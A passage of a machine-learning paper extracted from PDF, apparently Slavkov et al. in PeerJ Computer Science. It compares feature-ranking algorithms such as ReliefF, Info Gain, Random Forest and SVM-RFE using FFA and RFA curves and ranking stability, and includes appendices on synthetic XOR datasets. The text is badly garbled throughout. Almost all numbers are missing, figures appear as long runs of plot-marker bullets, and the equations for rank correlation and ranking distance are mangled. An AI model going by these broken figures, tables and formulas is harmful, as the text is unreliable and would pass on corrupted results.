sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ let us now take a look at the curves for the dataset water. from the ffa-curves in fig. d, we see that relieff, info gain and random forest ought to have the same top-ranked features, and as a consequence, the same last = − features too. however, the first features are ordered better by info gain and relieff, while the last are more properly ordered by random forest. we can conclude that none of the rankings is ideal, but we can come close to the ideal one (in terms of ffa-curves), if we combine the first part of the relieff (or info gain) and the second part of random forest. this claim is also confirmed by the rfa-curves of info gain and relieff (fig. e): these two algorithms indeed misplace some relevant features, since the accuracy of the model abruptly decreases and the end of the ranking. figure f suggests that we should prefer info gain and relieff over random forest since they are more stable. however, we can also notice that random forest is the least stable at the beginning of the ranking but its stability increases when the number of features gets larger. . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ●● ● ● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●● ●●●● ●● ●●●●●● ●● ●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ●● ●● ●●●● ●● ●●●●●●●●● ●●●●●●●● ●●●● ●●●●●● ●●●●●●●●●●●●●● ●●●● ●●●●● ● ●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ●● ● ●● ●● ●● ●●● ●●●● ●●● ●●●● ●●●●●●● ● ●● ●● ●● ●●● ● ● ●● ●●● ●●●●●●●●●●●●●●●●● ● ● ● infogain rforest relief svmrfe random a . . . . . . . feature ranking a cc u ra cy ●●●● ●● ●●●●●●●● ●● ●●● ● ● ● ● ● ●●● ● ● ●●● ●●●● ● ●● ● ● ● ●● ●● ● ●●● ●● ●●●● ●●● ● ● ●● ●● ● ● ● ●●●● ● ● ● ●●●●●●●●●● ●● ● ●● ● ● ●●● ●●●●●●● ● ● ● ● ● ● ● ●●● ● ● ●●● ●● ● ●●●●● ●●● ● ●● ●●●● ●●●●● ● ●●● ● ●● ●●●●●●●●● ● ● ●● ● ● ● ● ● ●●●●● ●●●●●●●●●●●●●●●●●●●● ●● ● ● ●●●●● ●● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● infogain rforest relief svmrfe random b . . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ●●●●●●●● ●● ●● ●● ●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●● ●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●● ● ●● ●●●●● ●● ●● ●● ●● ●● ●●● ●●●● ●●●●● ●●●●●● ●●●●● ●●●●● ●●●●●● ●●●●●● ●●●●●●● ●●●●●●●●● ●●●●●●●●●●● ●●●●●●●●●●●●●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● infogain rforest relief svmrfe c . . . . . . feature ranking a cc u ra cy ●● ●● ● ● ● ● ● ●● ● ●● ●● ●● ● ● ●●● ●● ● ● ● ●●●●● ●● ● ● ● ● ●● ●● ●● ●● ●●●●●● ● ●● ● ●●● ● ● ● ●● ● ●●● ●●●●●●● ●●●●●●● ●● ● ● ● ● ●● ● ● ● ●● ● ●●● ● ● ● ● ● ●● ● ● ● ● ● ● ●● ● ●●●● ● ● ●● ● ●● ●●●●●● ●● ● ●● ● ● ●● ●●●● ● ● ● ● ●●●●●●●●●●●●●●●●●●●● ●●●●● ●● ●● ● ● ●● ● ●●●● ●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ●● ● ●●● ●●●●●●●●●●●●●●●●●● ●● ● ● ● infogain rforest relief svmrfe random d . . . . . . feature ranking a cc u ra cy ●●● ●●●●● ●● ● ● ● ● ● ● ● ● ●●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●●● ● ● ●● ●● ●●●● ● ●●●● ●● ● ● ● ● ● ● ● ●● ● ●●● ● ● ● ● ●●● ●● ●●●●● ● ● ●● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ●● ●● ●● ● ● ● ●● ● ●●● ●●●●●● ● ● ● ● ● ● ●●● ●●● ●● ● ● ● ●● ● ● ● ●● ● ●● ● ●● ●● ● ●●●●●●●●●●●●●●●●●●●●● ●● ● ●●● ●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●● ● ● ● infogain rforest relief svmrfe random e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ●●●●●●●● ●●●● ●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● infogain rforest relief svmrfe f figure ranking quality assessment for datasets mll (a–c) and amlprognosis (d–f) in terms of the ffa (a and d) and rfa curves (b and e), and rankings’ stability estimates (c and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig- slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we begin the analysis of the high-dimensional datasets with mll. figure b shows that random forest completely misplaces some relevant features, since its rfa-curve mostly goes above the random-ranking one. even though it is evident from random forest’s ffa-curves that some relevant features are also successfully captured, random forest produces the worst ranking. info gain is slightly better, whereas relieff and svm-rfe are again the best algorithms. from the ffa-curves, we can conclude that svm-rfe places more features with higher relevance at the beginning of the ranking (its curve is higher than relieff’s), while rfa-curves reveal that svm-rfe also misses some quite relevant features: relieff’s curve is far below svm-rfe’s. figure c shows that relieff is considerably more stable than svm-rfe, hence we prefer the former over the latter on the mll dataset. the last example will show that sometimes, the understanding of the results is not that easy. in the figs. d and e, the ffa and rfa curves for the amlprognosis dataset are presented. in this case, only info gain performs considerably better than random ranking in terms of ffa-curves. svm-rfe is also able to find some relevant features at the beginning (peak of its curve at features), but after that, the models’ accuracy decreases, hence mostly noisy features are positioned here. some relevant features are again placed by relieff, info gain and random forest also around the , th place (local peak of their curves in the right part of the ffa-curve). rfa-curves confirm that there is indeed much noise in these data, since removing features does not result in an (at least approximately) decreasing curve. it may not come as a surprise that all ranking algorithms produce rankings that are very unstable at the beginning (fig. f), but it is interesting that after approximately , features, info gain and random forest produce quite stable rankings even though they have low quality. the reason for both low quality of rankings and their instability is probably the low number of instances accompanied by a high number of features ( and , respectively). conclusions we have proposed a method for evaluating and comparing feature rankings. the method is based on constructing two chains of predictive models that are built on two families of nested subsets of features. the first family of subsets are the sets of top-ranked features, while the second family consists of sets of bottom-ranked features. the predictive performances of the models form a ffa curve in the former case, and rfa curve in the latter case. we show in our experiments that both types of curves are necessary when comparing the rankings: ffa curves detect whether important features are placed at the beginning of the ranking, whereas rfa curves detect whether important features can still be found at the end of the ranking. in the set of experiments, we show the usefulness of the proposed evaluation method and its sensitivity to the rankings of different quality on synthetic data. the second set of experiments shows which of the learning methods are appropriate for building the slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ffa and rfa curves (svms, k-nn) and which are not (naïve bayes, decision tree, random forest). in the third set of experiments on synthetic data, we test several feature ranking algorithms and examine their properties. considering data with different properties, we show that relieff algorithm outperforms the other investigated approaches, both in terms of detecting relevant features and in terms of stability of the feature rankings it produces. moreover, we show the usefulness of the proposed approach in real-world scenarios. we evaluate feature rankings computed by four feature ranking algorithms on classification benchmark problems. the results reveal that there is no feature ranking algorithm that would dominate the others on every dataset. a possible disadvantage of the proposed method is that it can be computationally quite intensive, if we want to construct the curves in full resolution. namely, every point of a ffa or rfa curve comes at the cost of building and evaluating a predictive model. however, as justified in the method description, the full resolution is, especially when the number of features is really high, not necessary, and, moreover, the construction of the curve can be also easily parallelized. the work presented in this article can continue in many directions. first, of all, the proposed methodology could use other error measures, since accuracy is appropriate only for the task of classification when the distribution of target variable is approximately uniform. the strong modularity of the ffa/rfa curves allows for their use in any other predictive modeling task, for example, for the task of regression, we could use root mean squared error instead of accuracy. however, even though there exists a regression version of most of the learners, which are considered for constructing the curves, experiments should be repeated on those cases, since the conclusions about, for example, the most appropriate learner for constructing the curves, can be different. moreover, the method can be adapted not only to the regression setting, but also to different tasks of structured output prediction (bakr et al., ) and time series prediction. appendix in this section, we explain how we generate our synthetic datasets. for simplicity, we take both the features fi and the target ft to be binary and take values from the set { , }. we then partition the set of features f into feature interaction subsets fint of cardinality one and two. the feature sets with cardinality one are single features fi that are in an individual interaction with the target ft, while the features from the interaction sets with cardinality two determine the value of the target by the xor relation. the examples are generated as follows. for each example, we first randomly (from a uniform distribution) set the value of the target feature ft. after that, if fint = {fi}, then the value of feature fi is randomly chosen, so that p(fi = ft) = p. otherwise, we have fint = {fi, fj}, and the values of the features fi and fj are randomly chosen, so that p(xor(fi, fj) = ft) = p. we consider the probability values p ∈ { . , . , . , . }. the feature sets with p = . are in fact independent of the target ft, and can be considered as irrelevant features. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with combinations of these feature interaction sets, three datasets were generated, each of them consisting of , instances and features in total. the first dataset (named single) comprises only individually correlated features. the second dataset (named pair) contains relevant features related to the target via the xor relation, as well as irrelevant features. the third (named combined) is a combination of the first two. it contains xor-related features and individually correlated features. in order to simulate the redundancy of features, which occurs in real datasets, the three datasets are constructed in the following way: if the set fint of relevant features is included in the dataset, we also include two redundant copies of fint in the dataset. irrelevant features are realized independently of each other. the properties of the generated datasets are summarized in table , from which we can observe that there are relevant features in the single dataset, in the pair dataset, and in the combined dataset. the ground-truth feature relevances rel(fi) of the features fi are defined as follows. first, the relevance of each feature group fint is defined as the mutual information between the group and ft, namely rel(fint) = i(fint; ft). second, for fi ∈ fint, feature importances are obtained as relðfiÞ ¼ relðfintÞ=jfintj: ( ) for the particular three datasets, this ground-truth ranking rgt should also result in the optimal ffa and rfa curves, but this may not be the case in general. in the next section, we give the results of comparing it to the other feature rankings. appendix when discussing the results in the “evaluation by randomising the ground truth ranking”, we showed that, when the level of noise θ in the ranking increases, then (i) the quality of the ranking rθ decreases, and (ii) the rankings rgt and rθ become more and more distant. however, for the second point, we need to define a distance dist(rgt, rθ) between a noisy and the ground truth ranking. in the definition of dist(rgt, rθ) we use the average spearman rank correlation coefficient ρ(ra, rb) which is calculated as table properties of the synthetic datasets. fint p #copies in #copies in #copies in single pair combined . . . . . . . note: if p > . , #copies denotes the number of copies of the interaction set. in the last row where p = . , #copies corresponds to the number of independently realized irrelevant features. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ n � xn i¼ ðrankaðfiÞ � rankaÞðrankbðfiÞ � rankbÞ rarb where n is the number of features, therefore the average ranks ranka and rankb equal (n + )/ . standard variations σa, b are computed as ra;b ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffipn i¼ ðranka;bðfiÞ � ranka;bÞ q = ðn � Þ. for a given θ, the distance between rankings rgt and rθ is then computed as distðrgt; rhÞ ¼ � m xm t¼ qðrgt; rh;tÞ ( ) where m is the number of different realizations rθ, t of the noisy ranking rθ. table lists the values of the distances between the ground truth ranking rgt and its noisy versions rθ. note that, for all three synthetic datasets, the distances indeed increase when the amount of noise θ increases. appendix in “evaluation by randomising the ground truth ranking”, we analyzed rankings of different quality (with different amounts of noise) by comparing them to the ground truth ranking. in a real-world setting, the ground truth ranking is unknown and the feature rankings are induced directly from data. therefore, in this section we analyze feature rankings, produced by the four feature ranking methods from “analysis of different learning methods to construct ffa and rfa curves”, and the synthetic data described in “generating synthetic data”. when comparing the rankings, stability should also be taken into account as discussed earlier. therefore, the stability indicator ( ) is also included in the analysis. experimental setup we have used the same parameter settings for the feature ranking algorithms as in “analysis of different learning methods to construct ffa and rfa curves”. as noted and justified in the corresponding “results”, svms were used for constructing the ffa/rfa curves. the curves were constructed via -times stratified -fold cross validation, using different random seeds. to complement them, we also estimate the stability of each feature ranking algorithm by using the stability indicator described in “stability of feature ranking”. all feature ranking methods were tested only on the combined dataset. table the distances dist (rgt, rq) for different q values, for each of the three synthetic datasets. θ . . . . . . single . . . . . . . pair . . . . . . . combined . . . . . . . slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results for our analysis, we consider three types of graphs. the first two types are ffa curves (fig. a a) and rfa curves (fig. a b). the third is the stability estimate graph (fig. a c) where the y-axis refers to the value of the stability indicator ( ): the higher the value, the less stable the ranking method. each point, k, on the x-axis represents the size of the considered feature subsets, consisting of the top ranked k features. upon a visual inspection of the overall results in fig. , we can conclude that all of the feature ranking methods can correctly detect the features individually related to the target. however, info gain and svm-rfe (figs. c and d, respectively) exhibit random behavior for the xor features, that is, are unable to assign proper relevance values to them. random forests (fig. b) separate relevant from irrelevant features, but the ordering of the relevant features is mixed. finally, relieff (fig. a) provides the ranking that is the closest to the ground truth. these differences in behavior among the different ranking methods are also clearly reflected in the ffa and rfa curves in figs. a a and a b. in fig. a b, the rfa curves for info gain and svm-rfe have a similar behavior: namely, a linearly increasing accuracy (from right to left) in the region where the relevant features are randomly distributed and a sharp increase in accuracy in the region where the individually relevant features are included. on the other hand, the rfa curves of both random forests and relieff remain first constant and then increase abruptly when the top-ranked features are included. these two groups of methods can be also distinguished from the ffa curves. the ffa curves of all methods are first increasing abruptly and then slightly decreasing but the ffa curves of relieff and random forests increase during more steps and reach higher accuracy than info gain and svm-rfe. this clearly indicates that while info gain and svm manage to identify a proportion of the relevant features and put them at the . . . . . . feature ranking a cc u ra cy ground truth info gain random forests relieff svm−rfe random a . . . . . . feature ranking a cc u ra cy ground truth info gain random forests relieff svm−rfe random b . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce infogain rforest relief svmrfe c figure a ranking quality assessment for dataset combined in terms of the ffa (a) and rfa curves (b), and rankings’ stability estimates (c). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ top of the ranking, this proportion is nevertheless smaller than the one identified by random forests and relieff. forward feature addition and rfa curves undoubtedly allow us to compare the quality of the different ranking algorithms. the ffa/rfa curves of all methods are clearly better than the curves of the random ranking. the relieff ranking algorithm, however, clearly outperforms the other methods. it has the best error curves, for example, the curves that are the closest to the ground truth ranking. the second best method are random forests: they exhibit very similar performances, but show a slightly worse ffa curve. both info gain and svm-rfe are clearly inferior in terms of both ffa and rfa curves. stability-wise, as seen in fig. a c, all of the algorithms are stable in the region of the relevant features that they can detect, except for random forests, which has an instability peak exactly in this region. this means that random forests are in this case capable of detecting all the relevant features, but are highly unstable in the estimation of their ordering. further inspection reveals that relief generates not only the best rankings in terms of ffa/rfa curves, but also the most stable ones. appendix in this section, we provide detailed per dataset results from the experimental study. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ●●●●●● ● ● ● ● ●●●●● ● ●● ● ● ● ●●●●●●●●●●●● ●●●●●●●●●● ●●●● ●●●●●●● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ●● ●● ●● ● ●● ●● ●●●●● ● ●●●● ●●● ●●● ●● ●● ● ●● ●●●●●●●●●●●●●●● ●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ●● ●● ●● ●● ●●● ●● ●●● ●●●● ●●●● ●● ●● ●●●● ●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ●● ● ● ● ● ● ● ● ● ●● ●●● ●● ●● ●●● ●● ●● ●● ●● ●●● ●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ●●● ●● ● ●● ● ● ●● ● ●● ●● ● ● ●● ●● ●●● ●●● ●● ● ●●●●●●●●●● ●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ●●●●●● ●●● ●●● ●●● ●● ●● ●● ●● ●● ●● ●● ●● ●● ●● ●●● ●●● ●● ●●● ●●● ●● ● ●● ●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ●●●● ●●●●● ● ●●● ● ●●●●● ●● ●●● ●●● ● ● ● ●●● ●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ●● ●●●● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●● ● ● ● ● ● ● ● ●● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●● ●● ●●● ●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ●●● ●●●● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● ● ● ● ● ● ●● ● ● ● ● ●● ●●●●●● ● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ●● ● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ●●●●●● ● ●● ●●●●● ●●●● ●●● ●●●●●●●●●●●●●●● ●●●●●●●●●●●● ● ●●●●●●●●●● ●●●●●●●● ●● ●●●● ●●●●●●●●●●●●●●●●● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ● ●●●●●●●●●●●●●●●●●●●● ● ●●●●●●●●●●●●●●● ●●●●●● ●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ●● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●● ●● ●● ●● ● ● ● ● ● ● ●● ●● ●●● ●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●● ● ● infogain rforest relief svmrfe e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ●● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ● ● ●●●●● ● ●●● ●●● ●●● ●●● ●●●● ●●●● ●●●● ●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets aapc (a, c and e) and arrhythmia (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets australian (a, c and e) and balance (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig-a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random c . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe e . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe f figure a ranking quality assessment for datasets breast-cancer (a, c and e) and car (b, d and f) in terms of the ffa (a and b) and rfa curves (c and d), and rankings’ stability estimates (e and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig-a slavkov et al. ( ), peerj 